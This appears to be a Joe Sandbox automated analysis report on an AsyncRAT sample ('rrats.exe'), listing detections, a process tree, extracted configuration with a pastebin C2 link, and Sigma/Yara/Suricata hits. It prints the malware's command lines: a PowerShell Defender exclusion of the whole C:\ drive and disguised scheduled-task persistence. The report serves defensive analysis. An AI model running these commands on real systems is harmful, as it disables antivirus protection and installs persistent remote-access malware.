Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rrats.exe

Overview

General Information

Sample name:rrats.exe
Analysis ID:1571504
MD5:a2bdb024c98b7e8d3d06fc86e110d204
SHA1:2442360d37bf7e60b0d20c447bf5a0b51635a1d4
SHA256:72cd6d490f03122c90b4a52c8bc7fb5b938123eaf4926b5cc5cee14f44bef3cf
Tags:exeuser-lontze7
Infos:

Detection

AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Sigma detected: Cmd.EXE Missing Space Characters Execution Anomaly
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • rrats.exe (PID: 5780 cmdline: "C:\Users\user\Desktop\rrats.exe" MD5: A2BDB024C98B7E8D3D06FC86E110D204)
    • cmd.exe (PID: 3812 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • a.exe (PID: 1372 cmdline: a.exe -p1234 MD5: 7107F3FB53F9F3EAF3B95FD857F7AEE9)
        • rrat.exe (PID: 1968 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" MD5: 3D91C31A52BE4E262F7F18272294ED99)
          • cmd.exe (PID: 5712 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2180 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • cmd.exe (PID: 7212 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 7292 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
          • cmd.exe (PID: 7228 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7324 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • Explorer.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Roaming\Explorer.exe" MD5: 3D91C31A52BE4E262F7F18272294ED99)
  • Explorer.exe (PID: 7356 cmdline: C:\Users\user\AppData\Roaming\Explorer.exe MD5: 3D91C31A52BE4E262F7F18272294ED99)
    • cmd.exe (PID: 7492 cmdline: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7588 cmdline: schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7512 cmdline: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7596 cmdline: schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" MD5: 48C2FE20575769DE916F48EF0676A965)
  • explore.exe (PID: 7636 cmdline: C:\Users\user\AppData\Local\explore.exe MD5: 3D91C31A52BE4E262F7F18272294ED99)
  • cmd.exe (PID: 7652 cmdline: cmd.exe /C powershell Add-MpPreference -ExclusionPath C:" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7748 cmdline: powershell Add-MpPreference -ExclusionPath C:" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"Mutex": "RRAT_nMo7Zfs0N", "Certificate": "MIIE8jCCAtqgAwIBAgIQAP1hzmrgL5qNkPrA8fqq+zANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjAwNTA3MTgyNTI2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIIo9I64dBM7+4GawVLepf4oWhJAOY/dJ4gs5A8ivFPxJKpcXVNbUAF3J8kQGcQXQ9rP3T9mI6kK9FQVIHkQHkQ9CujdjULUw48/DnhM6TxtZKGAPNMceY6UjTOmvEASzwOzsIG16akW9RY2S4wbu2VRg7rkU9eiY3rtqt16/eJZgVZHWiO4hjkNgUyJCbkgxceew6xcmqQFaSAAcohOdaUJepuO6LLkt+rbwLIlCASIvM53oqu2eNL8Xk5/2bP2dhKTBfX/aD9xsfAN1BacEg5QcmwZgOeP8JJUC3nWLwXq8tRMPeTPYp9veHaQn9wWst6Rm3rDAh5bYbLxWNj4wi1stiAJ0yk0/+XXL5IQyCPfW/Q5oFYw+hhDiGFJQfim2ZfBvOjjoPVDdovpWp90c87gaiWGZbzLSedTomNfGcC36wUagtkKBXPFbcv4eWIXoPdwSjPk5LgJKgY+0g8iOCzawN9vIzUmkb3LPDwiluIqCOvqmUeAlrkthBhFJCOdfylNa3h4yDAsaZ+skQJle/YoF8AjBn0xAXsX1Q67/FSRUNDosuU+dqIZrii7jP8Qqc2F663sGamumrSAl3PXBL+UhVYoqkQqZG/D6e4qllcwH+dXBB27TMqY3b+xCv+slaraW2OIpYLQvTxGurpRF+BiCClZ9R0saYV2aSHBJW0rAgMBAAGjMjAwMB0GA1UdDgQWBBSjj9Cw11x4A95sxB4xy2LBe/0D8DAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBx9/VPQZFmIlqEl6QlR1lrToLbBdvksyr90Q/6LdGj9jlFfYpuzJjoSZ6UWYXifwEPHAIuaEqAzb91WeRkLgW6foTLlOOMu7fGFxi895huFT/QKfSUiKIRNxS8sM+/vBBz3YtvhehQaabSomOzl93/V5VJDt0e3xaANUeuVmnUlE1OMWWM0qRrGJtd7F8fE5Uk/rh7gIA/o8maQECpxpyHL1KTdcxdC3B+GyNQHYqiU9F/wRK5Zpx1+3YJ7162KhWtpzlm8iaVQToY3k8GPZkwj8sDRkuPpCzhDw3aHNtsAQmY0JEjBJcPAVCZ+/VzSboE+auT58BjwUf2DQRi2Xzh2jc/G08yvViXL4N88ZnK9QTiyMi50TFHBiqIizfDHL2YDJg2XpatRul49SPTxmIuwUt/3Wljz3kn/UM8MpcXPZbbzZMIYPjTiBqo9DijlBa/6JP4gtfzmgz6LCSv4wRGKR/9/Xkese/mE43zVLZopDMDn3tiPq8jobJ+2UAmm/V4WeRu3SiVn54aalDW3y9aWXpJhBXhldW+mF3q596n79OZDUNHZeor1Q3IFrXHZ/7zv9gk6Y5H96aQYUSEchAJikxVPk9Y5fygR16QG0U9sx0+7vTots9ioqvm7XMa+5xfZ+qk35RuiNqSlOY66mLEO0vex8cFFp3rvGj89VqD4g==", "Server Signature": "ZAEVYE4+WDbUbphyNWIlYDNiT/0G1m9oCuNRmqApkPq6DK43FO9IDy0E8zAIsJqQGMPgP1NzlXR2kcsyXklHOExDxYS3BgDNGipVUm+7oBSM9xIUV90aAwMlMzGtD/d5LKJ50z3PIis8Nj9WXzSPSL1/AbQ9Lq13L9V7jdRZiDkVQb2sLWoUErXM4eM0zmtCIpvRbO6yvBr/zUh3mKmOtugjkXGwE7CMEWCCB4fnfJm4tKYpDle+WxRa/ZfioEFdHTi9ZgzDLBvOWbQZWJMVvrlkXNZ7ENh/Ugpd+1rggG0z06CRTxmnEULOb+ej2kTU57iWbicoZRsme2t5XSwWmnD6OTmX1/mlgn9YnRFiqiL1GZlkNhXSuLUMELD7FV3L7xO86rjZLt8dX+BrHCZCzFF+3yzI7IEnpIf5Lmr+Q29LgsdB+ZUeCIBGnJ8GinuDNlijxi9AWzYj3Nmukgv2ltukS1k8021CWQu6TRKJXURqrECPkCwdt4z8i3A/3ojdz9AwFyK4tXUop7fkL++8lwinbMBXgxDLcXd/y+nmv34okEGRYMH5VUz1v6QIrfHhyYHSiQ7NqQ5953KaE+u9FN0JXCtZxmd2WiW/aoYw3ob7HIexuk0ytURxvG52YyVfdMuzhqe9QDc8U4MkkkOO4eQK2F/5q/iG99dyHrKwVek=", "External_config_on_Pastebin": "http://pastebin.com/raw/hbwHfEg3"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\explore.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    C:\Users\user\AppData\Local\explore.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\explore.exeINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0xe765:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 4 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000010.00000002.4490902100.0000000002B05000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
          • 0x3cce:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
          00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
              • 0x12cd1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
              00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                Click to see the 14 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                5.0.rrat.exe.200000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  5.0.rrat.exe.200000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    5.0.rrat.exe.200000.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                    • 0xe765:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                    5.2.rrat.exe.26db1a0.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      5.2.rrat.exe.26db1a0.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        Click to see the 3 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Cmd.EXE Missing Space Characters Execution Anomaly
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe", CommandLine: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Explorer.exe, ParentImage: C:\Users\user\AppData\Roaming\Explorer.exe, ParentProcessId: 7356, ParentProcessName: Explorer.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe", ProcessId: 7492, ProcessName: cmd.exe
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, ProcessId: 1968, TargetFilename: C:\Users\user\AppData\Roaming\Explorer.exe
                        Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, ParentProcessId: 1968, ParentProcessName: rrat.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, ProcessId: 7212, ProcessName: cmd.exe
                        Sigma detected: Invoke-Obfuscation VAR+ Launcher
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, ParentProcessId: 1968, ParentProcessName: rrat.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, ProcessId: 7212, ProcessName: cmd.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, ParentProcessId: 1968, ParentProcessName: rrat.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 5712, ProcessName: cmd.exe
                        Sigma detected: System File Execution Location Anomaly
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\Explorer.exe, CommandLine: C:\Users\user\AppData\Roaming\Explorer.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Explorer.exe, NewProcessName: C:\Users\user\AppData\Roaming\Explorer.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\Explorer.exe, ProcessId: 7356, ProcessName: Explorer.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, ParentProcessId: 1968, ParentProcessName: rrat.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 5712, ProcessName: cmd.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7212, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' , ProcessId: 7292, ProcessName: schtasks.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5712, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 2180, ProcessName: powershell.exe
                        Sigma detected: Proxy Execution Via Explorer.exe
                        Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: "C:\Users\user\AppData\Roaming\Explorer.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Explorer.exe, NewProcessName: C:\Users\user\AppData\Roaming\Explorer.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Explorer.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7228, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Explorer.exe" , ProcessId: 7412, ProcessName: Explorer.exe

                        Persistence and Installation Behavior

                        barindex
                        Sigma detected: Schedule system process
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" , CommandLine: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" , CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Explorer.exe, ParentImage: C:\Users\user\AppData\Roaming\Explorer.exe, ParentProcessId: 7356, ParentProcessName: Explorer.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" , ProcessId: 7512, ProcessName: cmd.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T14:12:40.786601+010028033053Unknown Traffic192.168.2.549760172.67.19.2480TCP
                        2024-12-09T14:12:53.020544+010028033053Unknown Traffic192.168.2.549795172.67.19.24443TCP
                        2024-12-09T14:13:02.207565+010028033053Unknown Traffic192.168.2.549819172.67.19.24443TCP
                        2024-12-09T14:13:08.614808+010028033053Unknown Traffic192.168.2.549836172.67.19.2480TCP
                        2024-12-09T14:13:11.467632+010028033053Unknown Traffic192.168.2.549844172.67.19.24443TCP
                        2024-12-09T14:13:20.624120+010028033053Unknown Traffic192.168.2.549869172.67.19.24443TCP
                        2024-12-09T14:13:29.787528+010028033053Unknown Traffic192.168.2.549894172.67.19.24443TCP
                        2024-12-09T14:13:36.117241+010028033053Unknown Traffic192.168.2.549911172.67.19.2480TCP
                        2024-12-09T14:13:38.962820+010028033053Unknown Traffic192.168.2.549919172.67.19.24443TCP
                        2024-12-09T14:13:48.479837+010028033053Unknown Traffic192.168.2.549942172.67.19.24443TCP
                        2024-12-09T14:13:54.927268+010028033053Unknown Traffic192.168.2.549959172.67.19.2480TCP
                        2024-12-09T14:13:57.774564+010028033053Unknown Traffic192.168.2.549968172.67.19.24443TCP
                        2024-12-09T14:14:06.899015+010028033053Unknown Traffic192.168.2.549994172.67.19.24443TCP
                        2024-12-09T14:14:13.630369+010028033053Unknown Traffic192.168.2.550010172.67.19.2480TCP
                        2024-12-09T14:14:20.317839+010028033053Unknown Traffic192.168.2.550021172.67.19.2480TCP
                        2024-12-09T14:14:26.523182+010028033053Unknown Traffic192.168.2.550023172.67.19.2480TCP
                        2024-12-09T14:14:34.583291+010028033053Unknown Traffic192.168.2.550026172.67.19.2480TCP
                        2024-12-09T14:14:41.130094+010028033053Unknown Traffic192.168.2.550028172.67.19.2480TCP
                        2024-12-09T14:14:47.676907+010028033053Unknown Traffic192.168.2.550030172.67.19.2480TCP
                        2024-12-09T14:14:54.442475+010028033053Unknown Traffic192.168.2.550033172.67.19.2480TCP
                        2024-12-09T14:15:01.185178+010028033053Unknown Traffic192.168.2.550036172.67.19.2480TCP
                        2024-12-09T14:15:07.864248+010028033053Unknown Traffic192.168.2.550039172.67.19.2480TCP
                        2024-12-09T14:15:22.618944+010028033053Unknown Traffic192.168.2.550047172.67.19.2480TCP
                        2024-12-09T14:15:37.637427+010028033053Unknown Traffic192.168.2.550053172.67.19.2480TCP
                        2024-12-09T14:15:38.178561+010028033053Unknown Traffic192.168.2.550053172.67.19.2480TCP
                        2024-12-09T14:15:44.362516+010028033053Unknown Traffic192.168.2.550054172.67.19.2480TCP
                        2024-12-09T14:15:44.785853+010028033053Unknown Traffic192.168.2.550054172.67.19.2480TCP
                        2024-12-09T14:15:51.334402+010028033053Unknown Traffic192.168.2.550056172.67.19.2480TCP
                        2024-12-09T14:15:57.863773+010028033053Unknown Traffic192.168.2.550057172.67.19.2480TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: rrats.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeAvira: detection malicious, Label: TR/Dropper.Gen
                        Source: C:\Users\user\AppData\Local\explore.exeAvira: detection malicious, Label: TR/Dropper.Gen
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeAvira: detection malicious, Label: TR/Dropper.Gen
                        Found malware configuration
